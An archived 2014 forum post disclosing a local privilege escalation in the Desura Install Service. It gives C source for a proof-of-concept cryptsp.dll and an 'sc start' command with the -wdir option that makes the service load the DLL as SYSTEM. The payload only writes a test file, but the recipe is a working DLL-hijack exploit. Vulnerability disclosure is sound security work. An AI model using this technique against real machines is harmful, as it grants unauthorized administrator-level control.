ZenHAX
http://zenhax.com/

Desura Install Service privilege escalation
http://zenhax.com/viewtopic.php?f=16&t=81
Page 1 of 1

Author:  aluigi [ Fri Aug 15, 2014 7:33 pm ]
Post subject:  Desura Install Service privilege escalation

The following was a quick test I made in the far October 2012 and it's still working.

"Desura is a digital distribution platform developed by Linden Research":
http://www.desura.com

Basically it's a competitor of Steam that, I remember, was mainly focused on indie games and then has been bought by Linden, the guys behind Second Life.

Anyway it's just a local privilege escaltion to become SYSTEM by using an option of the installer service, not so important but interesting to show.

Compile a dll with the name cryptsp.dll, the following is a quick example of dll for testing if you are able to write in a folder that requires Administrator privileges:
Code:
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {
    if(ulReason == DLL_PROCESS_ATTACH) {
        system("echo HELLO > c:\\windows\\poc.txt");
        Sleep(-1);
    }
    return TRUE;
}


Create an empty folder called bin and put the dll there.

Kill/close the Desura client if it's running.

Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll
Now start the service (any user can do that, just like with Steam) using the -wdir option:
Code:
sc start "Desura Install Service" -wdir z:\poc


That's all.

Source code of Desura Service:
https://github.com/desura/Desurium/blob ... ceMain.cpp

If you want to read about something similar for Steam:
http://revuln.com/files/ReVuln_Steam_Se ... curity.pdf

Page 1 of 1 All times are UTC
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/